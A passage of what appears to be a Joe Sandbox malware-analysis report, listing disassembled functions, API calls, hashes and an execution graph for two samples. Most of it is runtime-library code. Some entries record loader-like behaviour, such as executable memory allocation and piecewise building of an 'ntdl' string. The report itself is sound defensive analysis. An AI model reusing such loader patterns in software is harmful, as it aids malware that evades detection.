                                                    • Instruction Fuzzy Hash: A7513A3B61A785D6EA21EF15E05036E77A4FB8AB90F110139EB8D07B56CF38E461CB05
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                    • Instruction ID: 65b0b1dadbd3e3591d3a91530c139b82d64097d8014e07fce63ebbb546f2144b
                                                    • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                    • Instruction Fuzzy Hash: 3241F637B1A68581EB21CF65E4543A97360FB85B84F404031EE4E83789DF3CE445CB44
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID: csm
                                                    • API String ID: 3997070919-1018135373
                                                    • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                    • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                    • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                    • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                    APIs
                                                      • Part of subcall function 00007FFDA55D3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA55D3A63
                                                    • __GSHandlerCheckCommon.LIBCMT ref: 00007FFDA55E0993
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CheckCommonHandler__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 1543384424-629598281
                                                    • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                    • Instruction ID: b989c581b8330bb01781cc8d3bbcfb8f938c9495e4303539368d29202081d513
                                                    • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                    • Instruction Fuzzy Hash: B911DF27B197C9C5E711EF22E0512AD66A4EB46FC0F188035EE880BB56CE38D861CB08
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: TimerWaitable
                                                    • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                    • API String ID: 1823812067-484248852
                                                    • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                    • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                    • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                    • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                                    APIs
                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA55D112F), ref: 00007FFDA55D39E0
                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA55D112F), ref: 00007FFDA55D3A21
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                    • Instruction ID: 2166479aaec81c4753301b40fae82754635a466f824fbca70f92e842dc23aa28
                                                    • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                    • Instruction Fuzzy Hash: 9D113737609B8582EB62CF15F41026977A5FB89B84F594230EE8D07B69DF3CD5528B04
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: TimerWaitable
                                                    • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                    • API String ID: 1823812067-3336177065
                                                    • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                    • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                    • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                    • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                    • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                    • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                    • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 052601DF
                                                    Memory Dump Source
                                                    • Source File: 00000028.00000003.3638007229.0000000005260000.00000040.00001000.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_40_3_5260000_Twhtlb.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                    • Instruction ID: a2d83aafe109922ed99a7747f2a76f51660ddcd7ca90d15e55f0ea5f37318349
                                                    • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                    • Instruction Fuzzy Hash: 66A16070A10606EFDB28CFA9C884ABDB7B5FF48305F148169E41AD7351D770EA91DB90
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0526048B
                                                    • VirtualFree.KERNELBASE(?,?,00004000), ref: 052604F1
                                                    Memory Dump Source
                                                    • Source File: 00000028.00000003.3638007229.0000000005260000.00000040.00001000.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_40_3_5260000_Twhtlb.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2087232378-0
                                                    • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                    • Instruction ID: 73bd720a7c502b7f6016179dc2b6a2d2915784a19398d009608401892778c798
                                                    • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                    • Instruction Fuzzy Hash: 1621D875A14306ABDB309EA48C88FAFB7F9FF44214F104468EA5EA2281D671A944A660
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000028.00000003.3638007229.0000000005260000.00000040.00001000.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_40_3_5260000_Twhtlb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: l$ntdl
                                                    • API String ID: 0-924918826
                                                    • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                    • Instruction ID: 0de9afb403acaa6c4d3c0b49d8a5c33d46152b410ffae50c74b4760b6808bbd4
                                                    • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                    • Instruction Fuzzy Hash: 8C018471B10214AFCB04DF99C849DAEFBB9FF88654F044099F904A7360DB70DE409BA5

                                                    Execution Graph

                                                    Execution Coverage:6%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.3%
                                                    Total number of Nodes:1048
                                                    Total number of Limit Nodes:29
                                                    execution_graph 4394 5226b0 4395 5226e9 4394->4395 4396 5226dc 4394->4396 4398 5210cc __invoke_watson 5 API calls 4395->4398 4397 5210cc __invoke_watson 5 API calls 4396->4397 4397->4395 4404 5226f9 __except_handler4 __IsNonwritableInCurrentImage 4398->4404 4399 52277c 4400 522752 __except_handler4 4400->4399 4401 52276c 4400->4401 4402 5210cc __invoke_watson 5 API calls 4400->4402 4403 5210cc __invoke_watson 5 API calls 4401->4403 4402->4401 4403->4399 4404->4399 4404->4400 4410 5251ca RtlUnwind 4404->4410 4406 5227ff 4409 5210cc __invoke_watson 5 API calls 4406->4409 4407 5227cb __except_handler4 4407->4406 4408 5210cc __invoke_watson 5 API calls 4407->4408 4408->4406 4409->4400 4410->4407 4373 521391 4374 5213cd 4373->4374 4376 5213a3 4373->4376 4376->4374 4377 5228da 4376->4377 4378 5228e6 _raise 4377->4378 4379 522345 __getptd 66 API calls 4378->4379 4380 5228eb 4379->4380 4381 5251fb _abort 68 API calls 4380->4381 4382 52290d _raise 4381->4382 4382->4374 4411 5231b4 4412 5231c0 SetLastError 4411->4412 4413 5231c8 _raise 4411->4413 4412->4413 4414 525138 4415 52514a 4414->4415 4416 525158 @_EH4_CallFilterFunc@8 4414->4416 4417 5210cc __invoke_watson 5 API calls 4415->4417 4417->4416 4324 5228fe 4325 522901 4324->4325 4328 5251fb 4325->4328 4329 52521a 4328->4329 4332 525221 4328->4332 4330 521719 __NMSG_WRITE 66 API calls 4329->4330 4330->4332 4340 522f92 4332->4340 4334 525232 __invoke_watson 4336 52530a 4334->4336 4339 5252ca SetUnhandledExceptionFilter UnhandledExceptionFilter 4334->4339 4337 521697 _raise 66 API calls 4336->4337 4338 525311 4337->4338 4339->4336 4341 5220f9 __decode_pointer 6 API calls 4340->4341 4342 522f9d 4341->4342 4342->4334 4343 522f9f 4342->4343 4347 522fab _raise 4343->4347 4344 523007 4345 522fe8 4344->4345 4350 523016 4344->4350 4349 5220f9 __decode_pointer 6 API calls 4345->4349 4346 522fd2 4348 5222cc __getptd_noexit 66 API calls 4346->4348 4347->4344 4347->4345 4347->4346 4353 522fce 4347->4353 4351 522fd7 _siglookup 4348->4351 4349->4351 4352 522c72 _raise 66 API calls 4350->4352 4355 52307d 4351->4355 4357 521697 _raise 66 API calls 4351->4357 4363 522fe0 _raise 4351->4363 4354 52301b 4352->4354 4353->4346 4353->4350 4356 522c0a _raise 6 API calls 4354->4356 4358 522aa0 __lock 66 API calls 4355->4358 4359 523088 4355->4359 4356->4363 4357->4355 4358->4359 4360 5220f0 _raise 6 API calls 4359->4360 4361 5230bd 4359->4361 4360->4361 4364 523113 4361->4364 4363->4334 4365 523120 4364->4365 4366 523119 4364->4366 4365->4363 4368 5229c6 LeaveCriticalSection 4366->4368 4368->4365 3879 52235f 3882 52236b _raise 3879->3882 3880 52246d _raise 3881 522383 3884 522391 3881->3884 3886 5235ee ___free_lconv_mon 66 API calls 3881->3886 3882->3880 3882->3881 3883 5235ee ___free_lconv_mon 66 API calls 3882->3883 3883->3881 3885 52239f 3884->3885 3887 5235ee ___free_lconv_mon 66 API calls 3884->3887 3888 5223ad 3885->3888 3889 5235ee ___free_lconv_mon 66 API calls 3885->3889 3886->3884 3887->3885 3890 5223bb 3888->3890 3891 5235ee ___free_lconv_mon 66 API calls 3888->3891 3889->3888 3892 5223c9 3890->3892 3894 5235ee ___free_lconv_mon 66 API calls 3890->3894 3891->3890 3893 5223d7 3892->3893 3895 5235ee ___free_lconv_mon 66 API calls 3892->3895 3896 5223e8 3893->3896 3897 5235ee ___free_lconv_mon 66 API calls 3893->3897 3894->3892 3895->3893 3898 522aa0 __lock 66 API calls 3896->3898 3897->3896 3899 5223f0 3898->3899 3900 522415 3899->3900 3901 5223fc InterlockedDecrement 3899->3901 3915 522479 3900->3915 3901->3900 3903 522407 3901->3903 3903->3900 3906 5235ee ___free_lconv_mon 66 API calls 3903->3906 3905 522aa0 __lock 66 API calls 3907 522429 3905->3907 3906->3900 3914 52245a 3907->3914 3918 523d2d 3907->3918 3911 5235ee ___free_lconv_mon 66 API calls 3911->3880 3962 522485 3914->3962 3965 5229c6 LeaveCriticalSection 3915->3965 3917 522422 3917->3905 3919 52243e 3918->3919 3920 523d3e InterlockedDecrement 3918->3920 3919->3914 3932 523b55 3919->3932 3921 523d53 InterlockedDecrement 3920->3921 3922 523d56 3920->3922 3921->3922 3923 523d63 3922->3923 3924 523d60 InterlockedDecrement 3922->3924 3925 523d70 3923->3925 3926 523d6d InterlockedDecrement 3923->3926 3924->3923 3927 523d7a InterlockedDecrement 3925->3927 3928 523d7d 3925->3928 3926->3925 3927->3928 3929 523d96 InterlockedDecrement 3928->3929 3930 523da6 InterlockedDecrement 3928->3930 3931 523db1 InterlockedDecrement 3928->3931 3929->3928 3930->3928 3931->3919 3933 523bd9 3932->3933 3935 523b6c 3932->3935 3934 523c26 3933->3934 3936 5235ee ___free_lconv_mon 66 API calls 3933->3936 3947 523c4d 3934->3947 3990 525ae1 3934->3990 3935->3933 3937 523ba0 3935->3937 3945 5235ee ___free_lconv_mon 66 API calls 3935->3945 3939 523bfa 3936->3939 3941 523bc1 3937->3941 3949 5235ee ___free_lconv_mon 66 API calls 3937->3949 3942 5235ee ___free_lconv_mon 66 API calls 3939->3942 3943 5235ee ___free_lconv_mon 66 API calls 3941->3943 3948 523c0d 3942->3948 3952 523bce 3943->3952 3944 523c92 3953 5235ee ___free_lconv_mon 66 API calls 3944->3953 3954 523b95 3945->3954 3946 5235ee ___free_lconv_mon 66 API calls 3946->3947 3947->3944 3950 5235ee 66 API calls ___free_lconv_mon 3947->3950 3951 5235ee ___free_lconv_mon 66 API calls 3948->3951 3955 523bb6 3949->3955 3950->3947 3956 523c1b 3951->3956 3957 5235ee ___free_lconv_mon 66 API calls 3952->3957 3958 523c98 3953->3958 3966 525cbb 3954->3966 3982 525c76 3955->3982 3961 5235ee ___free_lconv_mon 66 API calls 3956->3961 3957->3933 3958->3914 3961->3934 4078 5229c6 LeaveCriticalSection 3962->4078 3964 522467 3964->3911 3965->3917 3967 525cc8 3966->3967 3981 525d45 3966->3981 3968 525cd9 3967->3968 3969 5235ee ___free_lconv_mon 66 API calls 3967->3969 3970 525ceb 3968->3970 3971 5235ee ___free_lconv_mon 66 API calls 3968->3971 3969->3968 3972 525cfd 3970->3972 3973 5235ee ___free_lconv_mon 66 API calls 3970->3973 3971->3970 3974 525d0f 3972->3974 3975 5235ee ___free_lconv_mon 66 API calls 3972->3975 3973->3972 3976 5235ee ___free_lconv_mon 66 API calls 3974->3976 3977 525d21 3974->3977 3975->3974 3976->3977 3978 5235ee ___free_lconv_mon 66 API calls 3977->3978 3979 525d33 3977->3979 3978->3979 3980 5235ee ___free_lconv_mon 66 API calls 3979->3980 3979->3981 3980->3981 3981->3937 3984 525c83 3982->3984 3989 525cb7 3982->3989 3983 525c93 3986 525ca5 3983->3986 3987 5235ee ___free_lconv_mon 66 API calls 3983->3987 3984->3983 3985 5235ee ___free_lconv_mon 66 API calls 3984->3985 3985->3983 3988 5235ee ___free_lconv_mon 66 API calls 3986->3988 3986->3989 3987->3986 3988->3989 3989->3941 3991 525af2 3990->3991 3992 523c46 3990->3992 3993 5235ee ___free_lconv_mon 66 API calls 3991->3993 3992->3946 3994 525afa 3993->3994 3995 5235ee ___free_lconv_mon 66 API calls 3994->3995 3996 525b02 3995->3996 3997 5235ee ___free_lconv_mon 66 API calls 3996->3997 3998 525b0a 3997->3998 3999 5235ee ___free_lconv_mon 66 API calls 3998->3999 4000 525b12 3999->4000 4001 5235ee ___free_lconv_mon 66 API calls 4000->4001 4002 525b1a 4001->4002 4003 5235ee ___free_lconv_mon 66 API calls 4002->4003 4004 525b22 4003->4004 4005 5235ee ___free_lconv_mon 66 API calls 4004->4005 4006 525b29 4005->4006 4007 5235ee ___free_lconv_mon 66 API calls 4006->4007 4008 525b31 4007->4008 4009 5235ee ___free_lconv_mon 66 API calls 4008->4009 4010 525b39 4009->4010 4011 5235ee ___free_lconv_mon 66 API calls 4010->4011 4012 525b41 4011->4012 4013 5235ee ___free_lconv_mon 66 API calls 4012->4013 4014 525b49 4013->4014 4015 5235ee ___free_lconv_mon 66 API calls 4014->4015 4016 525b51 4015->4016 4017 5235ee ___free_lconv_mon 66 API calls 4016->4017 4018 525b59 4017->4018 4019 5235ee ___free_lconv_mon 66 API calls 4018->4019 4020 525b61 4019->4020 4021 5235ee ___free_lconv_mon 66 API calls 4020->4021 4022 525b69 4021->4022 4023 5235ee ___free_lconv_mon 66 API calls 4022->4023 4024 525b71 4023->4024 4025 5235ee ___free_lconv_mon 66 API calls 4024->4025 4026 525b7c 4025->4026 4027 5235ee ___free_lconv_mon 66 API calls 4026->4027 4028 525b84 4027->4028 4029 5235ee ___free_lconv_mon 66 API calls 4028->4029 4030 525b8c 4029->4030 4031 5235ee ___free_lconv_mon 66 API calls 4030->4031 4032 525b94 4031->4032 4033 5235ee ___free_lconv_mon 66 API calls 4032->4033 4034 525b9c 4033->4034 4035 5235ee ___free_lconv_mon 66 API calls 4034->4035 4036 525ba4 4035->4036 4037 5235ee ___free_lconv_mon 66 API calls 4036->4037 4038 525bac 4037->4038 4039 5235ee ___free_lconv_mon 66 API calls 4038->4039 4040 525bb4 4039->4040 4041 5235ee ___free_lconv_mon 66 API calls 4040->4041 4042 525bbc 4041->4042 4043 5235ee ___free_lconv_mon 66 API calls 4042->4043 4044 525bc4 4043->4044 4045 5235ee ___free_lconv_mon 66 API calls 4044->4045 4046 525bcc 4045->4046 4047 5235ee ___free_lconv_mon 66 API calls 4046->4047 4048 525bd4 4047->4048 4049 5235ee ___free_lconv_mon 66 API calls 4048->4049 4050 525bdc 4049->4050 4051 5235ee ___free_lconv_mon 66 API calls 4050->4051 4052 525be4 4051->4052 4053 5235ee ___free_lconv_mon 66 API calls 4052->4053 4054 525bec 4053->4054 4055 5235ee ___free_lconv_mon 66 API calls 4054->4055 4056 525bf4 4055->4056 4057 5235ee ___free_lconv_mon 66 API calls 4056->4057 4058 525c02 4057->4058 4059 5235ee ___free_lconv_mon 66 API calls 4058->4059 4060 525c0d 4059->4060 4061 5235ee ___free_lconv_mon 66 API calls 4060->4061 4062 525c18 4061->4062 4063 5235ee ___free_lconv_mon 66 API calls 4062->4063 4064 525c23 4063->4064 4065 5235ee ___free_lconv_mon 66 API calls 4064->4065 4066 525c2e 4065->4066 4067 5235ee ___free_lconv_mon 66 API calls 4066->4067 4068 525c39 4067->4068 4069 5235ee ___free_lconv_mon 66 API calls 4068->4069 4070 525c44 4069->4070 4071 5235ee ___free_lconv_mon 66 API calls 4070->4071 4072 525c4f 4071->4072 4073 5235ee ___free_lconv_mon 66 API calls 4072->4073 4074 525c5a 4073->4074 4075 5235ee ___free_lconv_mon 66 API calls 4074->4075 4076 525c65 4075->4076 4077 5235ee ___free_lconv_mon 66 API calls 4076->4077 4077->3992 4078->3964 4418 522d3f 4419 523730 __calloc_crt 66 API calls 4418->4419 4420 522d4b 4419->4420 4421 52207e __encode_pointer 6 API calls 4420->4421 4422 522d53 4421->4422 4423 52543d 4424 521411 __amsg_exit 66 API calls 4423->4424 4425 525444 4424->4425 4079 521242 4080 521251 4079->4080 4081 521257 4079->4081 4085 521697 4080->4085 4088 5216bc 4081->4088 4084 52125c _raise 4086 521555 _doexit 66 API calls 4085->4086 4087 5216a8 4086->4087 4087->4081 4089 521555 _doexit 66 API calls 4088->4089 4090 5216c7 4089->4090 4090->4084 4383 521281 4386 52283c 4383->4386 4385 521286 4385->4385 4387 522861 4386->4387 4388 52286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4386->4388 4387->4388 4389 522865 4387->4389 4388->4389 4389->4385 4091 524247 4101 5241cb 4091->4101 4094 524272 setSBCS 4095 5210cc __invoke_watson 5 API calls 4094->4095 4097 52442a 4095->4097 4096 5242b6 IsValidCodePage 4096->4094 4098 5242c8 GetCPInfo 4096->4098 4098->4094 4100 5242db __invoke_watson __setmbcp_nolock 4098->4100 4108 523f0d GetCPInfo 4100->4108 4118 524144 4101->4118 4104 5241ea GetOEMCP 4107 5241fa 4104->4107 4105 524208 4106 52420d GetACP 4105->4106 4105->4107 4106->4107 4107->4094 4107->4096 4107->4100 4109 523ff3 4108->4109 4114 523f41 __invoke_watson 4108->4114 4113 5210cc __invoke_watson 5 API calls 4109->4113 4116 52409e 4113->4116 4178 525fe2 4114->4178 4116->4100 4117 526415 ___crtLCMapStringA 101 API calls 4117->4109 4119 524157 4118->4119 4125 5241a4 4118->4125 4126 522345 4119->4126 4122 524184 4122->4125 4146 5240a0 4122->4146 4125->4104 4125->4105 4127 5222cc __getptd_noexit 66 API calls 4126->4127 4128 52234d 4127->4128 4129 52235a 4128->4129 4130 521411 __amsg_exit 66 API calls 4128->4130 4129->4122 4131 523e04 4129->4131 4130->4129 4132 523e10 _raise 4131->4132 4133 522345 __getptd 66 API calls 4132->4133 4134 523e15 4133->4134 4135 523e43 4134->4135 4137 523e27 4134->4137 4136 522aa0 __lock 66 API calls 4135->4136 4138 523e4a 4136->4138 4139 522345 __getptd 66 API calls 4137->4139 4162 523dc6 4138->4162 4141 523e2c 4139->4141 4144 523e3a _raise 4141->4144 4145 521411 __amsg_exit 66 API calls 4141->4145 4144->4122 4145->4144 4147 5240ac _raise 4146->4147 4148 522345 __getptd 66 API calls 4147->4148 4149 5240b1 4148->4149 4150 522aa0 __lock 66 API calls 4149->4150 4154 5240c3 4149->4154 4151 5240e1 4150->4151 4152 52412a 4151->4152 4155 524112 InterlockedIncrement 4151->4155 4156 5240f8 InterlockedDecrement 4151->4156 4174 52413b 4152->4174 4153 5240d1 _raise 4153->4125 4154->4153 4158 521411 __amsg_exit 66 API calls 4154->4158 4155->4152 4156->4155 4159 524103 4156->4159 4158->4153 4159->4155 4160 5235ee ___free_lconv_mon 66 API calls 4159->4160 4161 524111 4160->4161 4161->4155 4163 523dca 4162->4163 4169 523dfc 4162->4169 4164 523c9e ___addlocaleref 8 API calls 4163->4164 4163->4169 4165 523ddd 4164->4165 4166 523d2d ___removelocaleref 8 API calls 4165->4166 4165->4169 4167 523de8 4166->4167 4168 523b55 ___freetlocinfo 66 API calls 4167->4168 4167->4169 4168->4169 4170 523e6e 4169->4170 4173 5229c6 LeaveCriticalSection 4170->4173 4172 523e75 4172->4141 4173->4172 4177 5229c6 LeaveCriticalSection 4174->4177 4176 524142 4176->4154 4177->4176 4179 524144 _LocaleUpdate::_LocaleUpdate 76 API calls 4178->4179 4180 525ff5 4179->4180 4188 525e28 4180->4188 4183 526415 4184 524144 _LocaleUpdate::_LocaleUpdate 76 API calls 4183->4184 4185 526428 4184->4185 4276 526070 4185->4276 4189 525e74 4188->4189 4190 525e49 GetStringTypeW 4188->4190 4191 525e61 4189->4191 4193 525f5b 4189->4193 4190->4191 4192 525e69 GetLastError 4190->4192 4194 525ead MultiByteToWideChar 4191->4194 4211 525f55 4191->4211 4192->4189 4216 526b1a GetLocaleInfoA 4193->4216 4199 525eda 4194->4199 4194->4211 4196 5210cc __invoke_watson 5 API calls 4198 523fae 4196->4198 4198->4183 4200 525eef __invoke_watson __alloca_probe_16 4199->4200 4203 5254b5 _malloc 66 API calls 4199->4203 4205 525f28 MultiByteToWideChar 4200->4205 4200->4211 4201 525fac GetStringTypeA 4202 525fc7 4201->4202 4201->4211 4206 5235ee ___free_lconv_mon 66 API calls 4202->4206 4203->4200 4207 525f3e GetStringTypeW 4205->4207 4208 525f4f 4205->4208 4206->4211 4207->4208 4212 525446 4208->4212 4211->4196 4213 525452 4212->4213 4214 525463 4212->4214 4213->4214 4215 5235ee ___free_lconv_mon 66 API calls 4213->4215 4214->4211 4215->4214 4217 526b48 4216->4217 4218 526b4d 4216->4218 4220 5210cc __invoke_watson 5 API calls 4217->4220 4247 526b04 4218->4247 4221 525f7f 4220->4221 4221->4201 4221->4211 4222 526b63 4221->4222 4223 526ba3 GetCPInfo 4222->4223 4227 526c2d 4222->4227 4224 526bba 4223->4224 4225 526c18 MultiByteToWideChar 4223->4225 4224->4225 4228 526bc0 GetCPInfo 4224->4228 4225->4227 4231 526bd3 _strlen 4225->4231 4226 5210cc __invoke_watson 5 API calls 4229 525fa0 4226->4229 4227->4226 4228->4225 4230 526bcd 4228->4230 4229->4201 4229->4211 4230->4225 4230->4231 4232 526c05 __invoke_watson __alloca_probe_16 4231->4232 4233 